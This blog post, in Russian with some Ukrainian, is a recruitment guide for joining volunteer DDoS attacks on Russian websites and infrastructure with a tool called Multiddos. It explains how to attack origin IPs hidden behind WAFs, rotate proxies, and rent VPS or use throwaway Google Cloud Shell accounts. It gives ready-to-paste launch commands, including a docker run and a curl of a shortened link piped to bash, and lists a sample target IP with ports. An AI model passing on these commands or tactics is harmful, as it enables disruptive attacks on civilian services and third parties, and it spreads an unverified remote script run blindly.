Украинский жнец на связи. DDOS-им РФ с помощью Multiddos

27
Украинский жнец на связи. DDOS-им РФ с помощью Multiddos - Украина, Польша, Германия.

Может ли обычный человек присоединиться к санкциям против РФ? Оказывается, может, причем быстро и просто. Наши санкции не нуждаются в согласованиях между несколькими странами, и продлятся еще много лет. Так что читайте и присоединяйтесь к киберфронту Украины.

Сначала оговорки. Если не понимать принципы DDOS, то можно нанести вред. Например, если запускать DDOS по российским сайтам, которые заблокированы на территории Украины, то DDOS вы будете только наши сети и наших провайдеров связи. Этот трафик не выйдет за границы Украины и только замедлит местные сети на пути к адресату. Исправить это легко, но нужно знать как. К этому мы вернемся ниже.

Что такое DDOS?

Это когда многие компьютеры общаются с сервером и он поначалу не успевает отвечать всем, а потом падает и вообще не отвечает никому. Поскольку атакуются не только вебсайты, но и другая цифровая инфраструктура, при ее выходе из строя перестают работать все сопутствующие сервисы. Когда атакуемый 1С не удается сдать отчетность. Когда атакуются аэропорты – тяжело приобрести билеты. Когда атакуются альтернативы google play, невозможно установить или пользоваться приложениями для смартфонов. И даже в случаях, когда атаки не дают 100% результатов, польза от них все равно есть. Компании в стране агрессора начинают терять дополнительные деньги из-за необходимости покупать защиту у Cloudflare.

Как этого добиться? На самом деле, это относительно просто. Надо иметь:

  1. достаточное количество компьютеров;
  2. Знание что именно и как именно нужно атаковать;
  3. Хорошо настроенный софт.

1. Достаточное ли количество компьютеров?

Все зависит с одной стороны от возможностей компьютеров, и с другой стороны от возможностей атакуемого сервера. Но в общем случае, несколько сот машин уже достаточно для независимых атак.

Очень важно, чтобы все компьютеры работали по одним целям, потому что не достигнув определенной критической массы невозможно существенно повлиять на работу серверов.

2. Что и как именно атаковать?

Напрямую атаковать сайт нет смысла. Он либо уже находится за WAF, либо быстро его включит, когда увидит атаку. WAF это Web Application Firewall, наиболее известным из которых является Cloudflare. WAF прячет от посторонних глаз реальный сервер сайта, поэтому «атакуя» www.1c.ru напрямую вы действительно атакуете WAF, который очень хорошо фильтрует атаки и имеет большие ресурсы для противостояния им.

Поэтому атаковать нужно не только адрес сайта, но и реальные IP-адреса серверов, которые с помощью разведки можно определить даже если WAF их скрывает. Такие атаки гораздо эффективнее.

Современные атаки обычно происходят на 4 и 7 уровне сетевой модели OSI. Поэтому когда говорят, что будем атаковать L4 и L7, подразумевают именно это.

7 уровень это прикладной (application) уровень, как правило HTTPS или HTTP, иногда FTP.

4 уровень – это транспортный (transport) уровень, то есть атаки по протоколу TCP, а иногда и UDP.

Чаще всего атаки идут одновременно по HTTPS и TCP как наиболее результативные.

При атаках не просто желательно, а крайне необходимо использовать прокси. Прокси – это другие компьютеры-посредники между вашим компьютером и сайтом. Они прячут ваш реальный IP, чем убивают сразу двух зайцев. Серверу трудно вас забанить, потому что разумно настроенные прокси постоянно спасаются, то есть меняются. Без прокси ваш статический IP быстро попадает в черный список сайта и блокируется. Также при работе через прокси сервер получает запросы от «посредников», разбросанных по всему миру. Сейчас это важно, потому что многие российские сайты уже блокируют трафик из Украины. Ниже мы дадим вам лучший инструмент, поддерживающий прокси и их автоматическую ротацию.

Перед тем как переходить к софту, коснемся вопроса, какие устройства подходят для DDOS. Ответим на этот вопрос в порядке от самого плохого к самому лучшему:

  • Не подходят для серьезных атак почти совсем: смартфоны и браузеры (сделаем вид, что это устройство). Атаки из браузеров мало эффективны. Смартфоны, пожалуй, получше, но и это в основном игрушки.
  • Подходят, но есть много нюансов: слабые ноутбуки, слабые ПК, атаки через Wi-Fi, атаки из-за слабого сетевого оборудования, атаки запущенные на виртуальных машинах (Virtual Box, Vmware). Как уже упоминалось, DDOS-атаки дают нагрузку не только на конечный пункт назначения, но и на все предыдущие звенья, начиная с самого устройства, где пакеты начинают генерироваться. Поэтому на слабом железе постоянно возникают проблемы. «Оно то работает, то не работает». Если ваш компьютер начинает подвисать, исчезает доступ в интернет или вылезают другие проблемы, связанные с сетью, это значит что локальное железо, или софт, не выдерживают нагрузок от DDOS пакетов. В таких случаях перезагрузите компьютер, чтобы починить сеть, попробуйте снизить интенсивность атаки или используйте другое железо в другой сети.
  • Наиболее доступный тип устройств, это обычные, относительно мощные, домашние компьютеры, желательно хотя бы с 4 ядрами и с проводным подключением к Интернету, хотя последнее необязательно.
  • Лучший вариант: VPS. Это виртуальные серверы, сдающие в аренду Digital Ocean, Vultr, Linode, Contabo, Azure, и многие другие провайдеры. Если подходить с умом, то аренда одного VPS будет стоить 5-8 евро в месяц. В таких серверах достаточно мощные каналы (от 100 до 1000 Мбит/с) и они расположены за пределами Украины, поэтому, пользуясь ими, вы не замедляете локальные сети. VPS могут работать день и ночь, что не всегда возможно с домашним компьютером. Существуют даже тарифы с почасовой оплатой, которые можно использовать только днем, когда доступ к сайтам наиболее нужен, его стоимость будет еще меньше. Сразу хотим предупредить, чтобы вы не совершили ошибку новичка. В некоторых тарифах есть лимиты по трафику, поэтому при его превышении будет сниматься дополнительная плата. Поэтому ищите тарифы без ограничений, или не забывайте удалять старую VPS и производить новую после использования определенного количества трафика. Если не уверены, всегда можно спросить в чате, ссылка на который будет в конце.

3. Лучший софт?

Есть много неэффективного софта, который использовался в феврале и марте, хотя где-либо используется до сих пор. Каким бы легким ни казался запуск DDOS через веб-страницу в браузере, или через малоэффективные LOIC/HOIC на компьютере или даже смартфоне, пользоваться ими нет большого смысла, есть более эффективные инструменты.

Multiddos

Украинский жнец на связи. DDOS-им РФ с помощью Multiddos

Наконец-то самое интересное, софт. Multiddos – это разработка украинской группы «Украинский Жнец», максимально упрощающей запуск атак, и сочетает в себе несколько других украинских инструментов.

Почему именно Multiddos? Потому что выглядит типичный путь начинающего, который услышал о DDOS атаки и хочет к ним присоединиться. В самом худшем случае он загрузит себе вирус. В получше, но все еще отрицательном варианте будет пользоваться ПО, которое вместо DDOS-у конечных целей будет DDOS-ить украинские сети, и оборудование провайдеров. В нейтральном варианте он будет пользоваться чем-то неэффективным и «работать» наедине без результата.

Когда и если он пройдет этот этап и найдет мощный инструмент, у него появятся следующие вопросы:

  • Как использовать Linux;
  • Как установить десятки программ и зависимостей для того чтобы DDOS инструмент заработал;
  • С какими параметрами его запускать;
  • Как делать обновления;
  • Где брать актуальные цели;
  • Как быть когда есть только Windows и установить Linux нет возможности;
  • Что делать когда в канале пишут “атакуем 5.178.83.44 | 21/TCP | 22/TCP | 25/TCP | 80/TCP | 443/TCP”;
  • Что означает “для UDP требуется VPN” и где его взять;
  • И главное, как просто перестать беспокоиться и полюбить DDOS РФ.

Для того чтобы решать эти вопросы был разработан Multiddos, который решает следующие проблемы:

  • Работает на Windows, Mac и Linux;
  • Сложная процедура установки и настройки ПО сводит к копипасту 1-2 команд;
  • Имеет открытый код и открытые списки атак. Все всегда можно посмотреть и проверить;
  • Использует наиболее эффективное ПО и наиболее эффективные методы для атак;
  • Постоянно обновляется;
  • Постоянно проверяет новые цели от Украинского Жнеца и IT Army и обновляет их самостоятельно каждые полчаса;
  • Помогает с атаками IT Army;
  • Поддерживает базу на сотни российских вебсайтов, что больше чем у IT Army, потому что мы не отпускаем цели много дней подряд;
  • Умеет работать в фоновом режиме;
  • Проверка базы на дубликаты и удаление их, что повышает производительность. Повторы неизбежны, когда цели собираются из нескольких источников.

Если попытаться втиснуть описание Multiddos в одно предложение, получим принцип Парето. 80% результата при расходовании 20% времени (усилий). Только пропорцию следует изменить на 90% и 10%. С Multiddos можно сразу перепрыгнуть этап набивки шишек и перейти к оптимальному результату. А если в процессе захотите глубже разобраться, как именно оно работает, то ничто вам в этом не помешает, и наличие инструкции, комьюнити и открытого кода только поможет.

Что происходит внутри Multiddos

Multiddos – это, как можно догадаться по названию, не одна программа, а сразу несколько модулей, которые можно как подключать, так и отключать. Когда вы запускаете Multiddos, то он производит 99% всей необходимой работы за вас. Загрузка и установка последних версий программ и зависимостей. Запускает отдельные модули внутри мултиплексора Tmux. Ищет последние цели с канала Украинского Жнеца и запускает DDOS атаку по сотням найденных целей с необходимыми параметрами. После этого каждые полчаса проверяет наличие новых целей и обновляет их по необходимости.

По умолчанию Multiddos использует следующие модули:

  • Чисто информационный модуль мониторинга gotop, с помощью которого можно отслеживать нагрузку на систему и исходящий трафик;
  • Модуль DDOS, основанный на украинской разработке mhddos_proxy. Кстати большое спасибо его разработчику, который сделал очень существенный вклад в становление украинского киберфронта. Этот модуль является сердцем Multiddos. Он генерирует тысячи DDOS пакетов в секунду и отправляет их одновременно на сотни сайтов и серверов, выбранных Украинским Женцем для атаки;
  • Последний модуль представляет собой модуль поиска новых прокси. Тоже от разработчика mhddos_proxy. Запуская Multiddos вы не только атакуете российские серверы, но и помогаете с поиском новых прокси, с которых вскоре начнут проводиться новые атаки. Найденные прокси автоматически отправляются на сервер разработчика mhddos_proxy. Будьте готовы к тому, что это довольно долгий процесс, и одна рабочая прокси находится после сканирования примерно 10 млн адресов.

К настоящему времени именно такую ​​конфигурацию мы считаем оптимальной, и добавление других модулей сейчас может только снизить производительность Multiddos. Если ситуация изменится, мы перенастроим Multiddos на более мощные инструменты. Если же вы хотите поэкспериментировать с параметрами и модулями, то можете сделать это с помощью дополнительных ключей.

Запуск Multiddos

Для запуска Multiddos рекомендуется использовать docker. Не пугайтесь, это очень просто и дает несколько преимуществ:

  • ПО, разработанное для Linux, можно без потери быстродействия запускать на Windows, Mac и Linux, используя для этого одну и ту же команду;
  • Docker выполняет команды в изолированной среде, что безопаснее и поэтому мы рекомендуем именно этот способ;
  • Этот способ не требует ручного ввода пароля.

Для установки docker необходимо либо скачать установщик с официального сайта docker, либо выполнить одну из следующих команд:

  • Для Windows 10 або 11: winget install -e --id Docker.DockerDesktop
  • Для Linux (Ubuntu, Debian, Kali, та інших дистрибутивів з apt): sudo apt install docker.io
  • Для MacOS: brew install docker docker-machine

После этого остается только запустить команду для начала атаки DDOS:

  • docker run -it --rm --log-driver none --name multidd --pull always karboduck/multidd

Посмотрим, что она делает:

docker run -it --rm — стандартний набір параметрів для запуску чогось у docker. ‘-it’ запускає процес в інтерактивному режимі, а ‘--rm’ робить так щоб він повністю зупинявся при закритті. Це технічні моменти роботи docker, які насправді не дуже цікаві.

--log-driver none — відключає лог файли. Використовується як запобіжник, бо інколи docker починає писати нескінченні лог файли та може забити все вільне місце на накопичувачу за кілька годин або днів.

--name multidd — ім’я нашого процесу (контейнеру, якщо говорити мовою docker). Потрібно лише для того, щоб при необхідності контейнер було легко зупинити командою docker stop multidd. Інакше спочатку доведеться дізнаватись через docker ps випадкове ім’я контейнеру, яке призначається в момент запуску.

--pull always — опція яка каже docker завжди перевіряти на сервері нову версію.

karboduck/multidd — це ім’я файлу (мовою docker – образу) який ми запускаємо. По суті karboduck/multidd це налаштований образ Ubuntu в якому автоматично виконується Multiddos.

Если вы пользуетесь Linux или WSL2, или просто так удобнее, то есть другой вариант запуска Multiddos, без установки docker:

  • curl-L tiny.one/multiddos | bash && tmux a

curl -L tiny.one/multiddos – команда curl загружает файл по ссылке tiny.one/multiddos. Поскольку tiny.one/multiddos это сокращенная ссылка, которая делает редирект на другой адрес, то используется ключ -L для того чтобы сохранять не HTML страницу куда ведет прямая ссылка, а именно файл на который эта страница перенаправляет.

| bash — означает что сохранившийся файл (скрипт) передается в командную оболочку bash и там выполняется.

&& tmux a — если все предыдущие команды успешно выполнены, то сессия tmux (программа объединяющая другие программы в одном терминале и позволяющая переключаться между ними) выводит все запущенные программы в Multiddos из фонового режима в терминал. Если не добавлять эту команду, все будет работать, но в фоновом режиме, то есть вы не сможете видеть программы в терминале.

Украинский жнец на связи. DDOS-им РФ с помощью Multiddos

Советы:

  • По возможности не пользуйтесь виртуальными машинами (Virtual Box, Wmvare), их сетевая система во время атак DDOS может работать очень нестабильно и у вас постоянно будут появляться ошибки;
  • Если что-то не работает, скорее всего отвалилась сеть, перезагружайте компьютер;
  • Не используйте рабочие компьютеры. В стране военное положение, но использование не собственных ресурсов подобным образом может стать источником проблем;
  • Если вы не уверены, не используйте Multiddos с нестандартными настройками. Его очень легко разбалансировать и он начнет работать в несколько раз медленнее, чем должен. Просто запустив Multiddos в автоматическом режиме вы уж очень помогаете – поддерживаете атаку и ищете новые прокси;
  • В домашних сетях (все что находится за одним роутером) нет необходимости запускать атаки из нескольких приборов или в несколько процессов. Один процесс Multiddos может полностью использовать выходной канал, и запуск других копий будет скорее всего мешать и замедлять атаку.
  • Если вы хотите посмотреть как удачно проходят атаки, то состояние индивидуальных сайтов можно проверить на https://check-host.net/check-http. Или же на сайте IT Army;
  • Если у вас нет возможности атаковать с собственного компьютера, попробуйте использовать бесплатный Google Cloud Shell. Если у вас есть аккаунт Gmail, то уже есть доступ к Google Cloud Shell. Бесплатно его можно использовать всего 50 часов в неделю, но в последнее время доступ блокируют быстрее. В таком случае придется подождать, когда блокировку снимут, как правило это несколько часов. Также Cloud Shell любит обрывать сессию, поэтому его нужно иногда перезапускать. Но даже запустив Multiddos на Google Cloud Shell всего несколько раз в день, вы уже отправите десятки Гигабайт трафика по целям. Нам неизвестны факты, чтобы Google полностью блокировал аккаунты Cloud Shell, тем более что Google не блокирует почтовый ящик Gmail, который считается отдельным сервисом, но если вы хотите перестраховаться, то используйте Cloud Shell с каким-то ненужным Gmail аккаунтом.

В конце концов, мы призываем вас присоединиться к украинскому киберфронту. Добавляйтесь к каналу Украинский Жнец, заходите в наш чат. Добавляйтесь также в IT ARMY of Ukraine. Обязательно дайте эту ссылку своим друзьям и объясните им как легко запускается Multiddos, и как важно постоянно давить на страну агрессора всеми доступными способами.

Нам нужен каждый человек, потому что наша сила в количестве. Присоединяясь к Украинскому Жнецу, вы присоединяетесь ко всему украинскому киберфронту, потому что мы уже объединены с другими крупнейшими группами и помогаем друг другу. Если нас будут тысячи, мы сможем парализовать работу любых сервисов страны агрессора. И позже вы сможете написать в резюме, ранее работавшие в госсекторе… то есть по госсектору… РФ, но это детали.

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *


восемнадцать + семнадцать =